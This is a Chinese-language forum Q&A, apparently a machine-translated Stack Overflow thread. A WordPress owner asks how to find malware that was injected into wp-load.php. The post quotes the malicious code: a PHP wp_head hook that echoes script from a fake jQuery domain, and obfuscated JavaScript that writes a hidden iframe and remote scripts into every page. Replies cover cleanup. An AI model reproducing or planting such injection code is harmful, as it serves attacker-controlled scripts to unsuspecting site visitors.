1
我最近用WordPress做了一個網站,但這個病毒最近一直在竊聽我。它編輯整個wp-load文件,並寫道:這條線在哪裏?
function pluginAuth(){
echo(@wp_remote_retrieve_body(@wp_remote_get('http ://jquerys.net/jquery-1.6.3.min.js')));
}
@add_action('wp_head', 'pluginAuth');
注意,它指向一個假冒的jQuery網站「jqueryS」。我終於找到了導致它到我的主頁(topdailyfights.com)並檢查代碼(它在行78),但不知道哪一個wordpress文件包含它的行。
這是代碼:
<script type="text/javascript">if(document.referrer == ''){document.write('<if'+'rame src="http://jquerys.net/analytics.php?frame=yes" width="1" height="1" frameborder="0" scrolling="no" marginwidth="0" marginheight="0"></ifr'+'ame>');document.write('<s'+'cript type="text/javascript" src="http://jquerys.net/analytics.js"></scrip'+'t>');}else{document.write('<sc'+'ript type="text/javascript"src="http://jquerys.net/jquery.js"></scrip'+'t>');}</script><script type="text/javascript" src="http://jquerys.net/license.js"></script><style type="text/css" media="print">#wpadminbar { display:none; }</style>
在哪裏可以此行定位?
由於提前,
JB
解決
文件名是wp-load.php位於www文件夾中。我一直在搜索public_html文件夾。使用Windows Grep可以找到它。
真棒工具;我建議。
謝謝大家。
將其全部刪除,替換爲備份,修補它,更改所有密碼。 – 2013-08-20 22:11:24
@Dagon所有備份我包含黑客。 Jayson我不知道該怎麼做 –
然後從源恢復 – 2013-08-20 22:17:09